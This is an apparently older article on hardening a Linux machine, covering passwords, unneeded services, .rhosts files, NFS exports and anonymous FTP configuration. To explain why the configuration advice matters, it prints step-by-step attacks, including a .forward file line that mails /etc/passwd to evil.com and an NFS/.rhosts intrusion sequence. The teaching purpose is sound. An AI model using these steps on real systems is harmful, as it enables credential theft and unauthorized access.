# Securing Your Linux Box

Autor: Peter Vertes

---

With Linux becoming widespread in the work environment, the security of
the individual machines must be considered. Machines running Linux can
be networked easily, creating the potential risk of unauthorized users
gaining access. This is particularly true if your Linux installation is
straight out of the box. I will give a brief introduction to securing
your Linux box and making your network environment a safer place for
both your data and the people who use use it.

\`\`You are only as strong as the weakest link in your defense,'' says
the Chinese proverb, and this is certainly true in the field of computer
security. If you forget to patch that newly downloaded version of
**lpd** all your walls can come crumbling down, even with the securest
system in the world. Always be cautious when installing any new
software. If you are using Linux only as a desktop machine at home and
you connect to the Internet via a modem, you do not have to worry so
much. On the other hand, if you are running a mission-critical server
wired into the Net, I would strongly advise checking out the security
history of any piece of software that you wish to install (remembering
*that* famous version of Sendmail).

Several mailing lists and many web pages offer extensive help on Linux
security. The information is out there, you just need to go and harvest
it. If you don't have the time, patience or know-how, contact a security
consultant to take a look at your system setup and discover any
potential weak spots. Usually security consultant firms have their own
*Tiger Teams* who for a fee will attempt to make the walls crumble
around your computer(s). Their object is to get into your system under a
certain period of time and some even refund your money if they are
unsuccessful. Tiger Teams are a valuable asset to security-conscious
companies. Since Tiger Teams cost quite a bit, I would suggest you break
into your own machines. This exercise can save you money, and give you a
better understanding of the structure and different abstract layers of
Linux in the process.

The starting point of our Linux security tour is the password. Many
people keep their entire life on a computer and the only thing
preventing others from seeing it is the eight-character string called a
password. Not something one would call completely reliable. Contrary to
popular belief, an uncrackable password does not exist. Given time and
resources all passwords can be guessed either by social engineering or
by brute force.

Since password cracking can be a time- and resource-consuming art, make
it hard for any cracker who has grabbed your password file. Running a
password cracker on a weekly basis on your system is a good idea. This
helps to find and replace passwords that are easily guessed or weak.
Also, a password checking mechanism should be present to reject a weak
password when first choosing a password or changing an old one.
Character strings that are plain dictionary words, or are all in the
same case, or do not contain numbers or special characters should not be
accepted as a new password.

A safe password can be constructed by taking the first letter of your
favorite phrase, quote or sentence and adding special characters. For
example, suppose my favorite phrase is, \`\`the quick brown fox jumped
over the lazy dog,'' by taking the first letter of every word, I'd end
up with **tqbfjotld**. Next, I'd add special characters and perhaps
squeeze in the year resulting in a password of **9tqbf\!jotld8**. This
is a much secure than the name of your spouse or child.

Word lists containing hundreds (if not thousands) of words that could be
fed to a password cracker are available on the Internet. Some contain
only names, so cracking the password \`\`maggie'' is quite trivial while
the likelihood of **9tqbf\!jotld8** appearing in one of those lists is
quite slim. However, even though if our proposed password is not likely
to appear in a word list, more advanced cracker programs come with a
feature called *Incremental Cracking Mode* which means that every
possible permutation is tried. The user gives it the minimum and maximum
number of letters in a password, upper case or lower case, inclusion of
special characters and numbers, and the passwords cracker does the rest.
Granted, it could take a lot of time and resources, but it is possible.

Next, be aware of the services running on your system. Most
distributions of Linux have HTTP, FTP, SMB, Sendmail and various other
services running as default. Not everyone needs a web server running so
why not get rid of it--it takes up resources and can be a potential
security risk. To terminate web services, type:

```
kill -9
```

To find out the process ID(s) of a certain daemon or service, type:

```
ps aux | grep
```

Also, comment these daemons out of your start-up scripts so that they
will not restart after a reboot. Unused services can let others gain
information about your system and they could also pose as a security
risk.

Another thing to avoid is the use of .rhosts files, as they are a
favorite of crackers. The .rhosts files contain names of systems on
which you have an account. When you use TELNET to log in to a system,
the system checks its .rhosts file and if your machine name is found, it
gives you access without the need for a password.

For more information about the .rhosts file, look in your favorite Linux
or System Administration manual. One of the most famous exploits
involving the .rhosts file is the misconfiguration of the *Network File
System* (NFS). First the hacker checks for any exported file systems on
your machines (to check, type: `showmount -e`), and if any are world
writable. Next he remotely mounts your file system and places an .rhosts
file into a user's directory. Last, the hacker uses TELNET to log into
your machine as the that user, and your system is now compromised. The
moral of this story: leave the configuration of the **nfsd** to someone
who is more experienced than you or read the documentation carefully.

Another similar hack involves the misconfiguration of a popular service
commonly found on the Internet; anonymous FTP. The first, and obvious
method, of gaining unauthorized access via anonymous FTP is by letting
the public have access to your password file. Granted all passwords are
stored in encrypted form, but remember we've already shown crackers can
get by this. Another way to gain access to the local password file is by
exploiting the writeability of the /ftp directory. Look at these simple
steps:

1.  Create a fake .forward file that has the following command in it:

```
|/bin/mail evildude@evil.com < /etc/passwd
```

1. Connect to the victim machine via FTP and log in as user FTP.
2. Enter any password you wish.
3. Upload the .forward file you have created in Step 1.
4. Log out and send mail to ftp@victim.machine.com.
5. Sit back as victim.machine.com e-mails you a copy of its local password file.

Clearly, an easy way to get a password file. The heart of this hack lies
in a simple mistake made by the system administrator; so, *never* make
the /ftp directory writable by user *anonymous*. Setting up an anonymous
FTP server is an art of its own, but it will help to remember these
simple rules:

  - *Only* the /incoming directory should be made writable and *only* by
    root and user FTP.
  - Anonymous FTP users should have *only* executable (and read) access
    to the /pub and the /incoming directory.
  - FTP users should *NOT* be able to write to /ftp. If you enable write
    access, the above mentioned hack can (and presumably will) be made.
    For more information on how to correctly set up an anonymous FTP
    service, check out the man page for **ftpaccess** or the CERT
    advisory titled 93:10 (found at http://www.cert.org/).

One last thing to remember is that the system logs are your friends. The
logs are the only way to find out what is/has/will be happening on your
system, so keep reading them. Also, make sure that they are not being
tampered with by intruders or by fellow system administrators.

As Linux finds its way into more and more corporate environments, it is
a crucial step to keep users out of each other's files and patch all the
holes that might be utilized by hackers. With the notion of
interconnectivity, industrial espionage will also be on the rise. With
simple preventative measures and user education, the workplace can be a
safe place for your secrets.

